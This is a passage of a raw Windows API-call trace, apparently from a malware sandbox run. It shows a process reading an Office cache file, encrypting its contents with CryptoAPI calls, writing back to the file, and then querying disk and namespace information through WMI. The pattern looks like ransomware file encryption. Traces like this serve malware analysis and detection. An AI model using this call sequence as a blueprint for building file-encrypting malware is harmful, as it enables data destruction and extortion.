ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290)) returned 1 [0164.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0164.228] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpFilePart=0x0) returned 0x48 [0164.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0164.229] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0164.229] GetFileType (hFile=0x45c) returned 0x1 [0164.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0164.229] GetFileType (hFile=0x45c) returned 0x1 [0164.229] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x431a290 [0164.231] ReadFile (in: hFile=0x45c, lpBuffer=0x16fe1018, nNumberOfBytesToRead=0x431a290, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x16fe1018*, lpNumberOfBytesRead=0x6c0f4ec*=0x431a290, lpOverlapped=0x0) returned 1 [0186.065] CloseHandle (hObject=0x45c) returned 1 [0186.065] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0x66bb1e0) returned 1 [0186.066] CryptGenRandom (in: hProv=0x66bb1e0, dwLen=0x10, pbBuffer=0x3838344 | out: pbBuffer=0x3838344) returned 1 [0186.631] CryptImportKey (in: hProv=0x66bb1e0, pbData=0x37d1ec0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7f790) returned 1 [0186.631] CryptContextAddRef (hProv=0x66bb1e0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0186.631] CryptContextAddRef (hProv=0x66bb1e0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0186.631] CryptDuplicateKey (in: hKey=0xb7f790, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7ef90) returned 1 [0186.631] CryptContextAddRef (hProv=0x66bb1e0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0186.631] CryptSetKeyParam (hKey=0xb7ef90, dwParam=0x4, pbData=0x37d1fa0*=0x1, dwFlags=0x0) returned 1 [0186.631] CryptSetKeyParam (hKey=0xb7ef90, dwParam=0x1, pbData=0x37d1f6c, dwFlags=0x0) returned 1 [0187.747] CryptEncrypt (in: hKey=0xb7ef90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cc61018*, pdwDataLen=0x6c0f4b8*=0x431a2a0, dwBufLen=0x431a2a0 | out: pbData=0x1cc61018*, pdwDataLen=0x6c0f4b8*=0x431a2a0) returned 1 [0192.806] CryptEncrypt (in: hKey=0xb7ef90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0d70*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x35f0d70*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0192.808] CryptDestroyKey (hKey=0xb7f790) returned 1 [0192.808] CryptReleaseContext (hProv=0x66bb1e0, dwFlags=0x0) returned 1 [0192.808] CryptReleaseContext (hProv=0x66bb1e0, dwFlags=0x0) returned 1 [0192.808] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpFilePart=0x0) returned 0x48 [0192.808] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0192.808] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0192.815] GetFileType (hFile=0x45c) returned 0x1 [0192.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0192.815] GetFileType (hFile=0x45c) returned 0x1 [0192.815] WriteFile (in: hFile=0x45c, lpBuffer=0x35f1394*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x35f1394*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0192.817] CloseHandle (hObject=0x45c) returned 1 [0192.817] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0192.817] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0192.817] CoTaskMemFree (pv=0xbed438) [0192.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0192.818] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0192.818] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0192.818] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0192.818] IUnknown:Release (This=0xb51e34) returned 0x1 [0192.819] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x6027730) returned 0x0 [0192.819] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027730, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0192.820] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027730, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x6030d30) returned 0x0 [0192.820] WbemDefPath:IUnknown:Release (This=0x6027730) returned 0x0 [0192.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x6030d30) returned 0x0 [0192.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0192.820] WbemDefPath:IUnknown:AddRef (This=0x6030d30) returned 0x3 [0192.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0192.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0192.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0xbdf210) returned 0x0 [0192.820] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf210, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0192.820] WbemDefPath:IUnknown:Release (This=0xbdf210) returned 0x3 [0192.820] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0192.820] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0192.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0192.820] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x2 [0192.821] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x1 [0192.821] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0192.821] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0192.821] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x6030d30) returned 0x0 [0192.821] WbemDefPath:IUnknown:AddRef (This=0x6030d30) returned 0x3 [0192.822] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x2 [0192.822] WbemDefPath:IWbemPath:SetText (This=0x6030d30, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0192.822] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030d30, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0192.823] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0192.823] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0192.823] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030d30, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0192.823] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030d30, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0192.823] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030d30, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0192.823] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030d30, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0192.823] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030d30, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0192.823] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0192.823] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0192.823] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0192.823] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0192.823] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0192.823] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0192.823] IUnknown:Release (This=0xb51e34) returned 0x1 [0192.824] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x60277a0) returned 0x0 [0192.824] WbemDefPath:IUnknown:QueryInterface (in: This=0x60277a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0192.824] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60277a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x6030cc0) returned 0x0 [0192.824] WbemDefPath:IUnknown:Release (This=0x60277a0) returned 0x0 [0192.824] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x6030cc0) returned 0x0 [0192.824] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0192.825] WbemDefPath:IUnknown:AddRef (This=0x6030cc0) returned 0x3 [0192.825] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0192.825] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0192.825] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0xbdef60) returned 0x0 [0192.825] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdef60, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0192.825] WbemDefPath:IUnknown:Release (This=0xbdef60) returned 0x3 [0192.825] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0192.825] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0192.825] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0192.825] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x2 [0192.825] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x1 [0192.825] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0192.825] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0192.825] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x6030cc0) returned 0x0 [0192.825] WbemDefPath:IUnknown:AddRef (This=0x6030cc0) returned 0x3 [0192.825] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x2 [0192.825] WbemDefPath:IWbemPath:SetText (This=0x6030cc0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0192.826] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0192.826] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0192.826] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0192.826] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0192.826] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0192.826] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0192.826] IUnknown:Release (This=0xb51e34) returned 0x1 [0192.827] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x601f510) returned 0x0 [0192.827] WbemLocator:IUnknown:QueryInterface (in: This=0x601f510, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0192.827] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f510, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x6027780) returned 0x0 [0192.827] WbemLocator:IUnknown:Release (This=0x601f510) returned 0x0 [0192.827] WbemLocator:IUnknown:QueryInterface (in: This=0x6027780, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x6027780) returned 0x0 [0192.827] WbemLocator:IUnknown:QueryInterface (in: This=0x6027780, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0192.827] WbemLocator:IUnknown:AddRef (This=0x6027780) returned 0x3 [0192.827] WbemLocator:IUnknown:QueryInterface (in: This=0x6027780, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0192.827] WbemLocator:IUnknown:QueryInterface (in: This=0x6027780, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0192.827] WbemLocator:IUnknown:QueryInterface (in: This=0x6027780, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0192.827] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0192.827] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0192.827] WbemLocator:IUnknown:QueryInterface (in: This=0x6027780, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0192.828] WbemLocator:IUnknown:Release (This=0x6027780) returned 0x2 [0192.828] WbemLocator:IUnknown:Release (This=0x6027780) returned 0x1 [0192.828] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0192.828] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0192.828] WbemLocator:IUnknown:QueryInterface (in: This=0x6027780, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x6027780) returned 0x0 [0192.828] WbemLocator:IUnknown:AddRef (This=0x6027780) returned 0x3 [0192.828] WbemLocator:IUnknown:Release (This=0x6027780) returned 0x2 [0192.828] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0192.828] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0192.828] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0192.828] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, 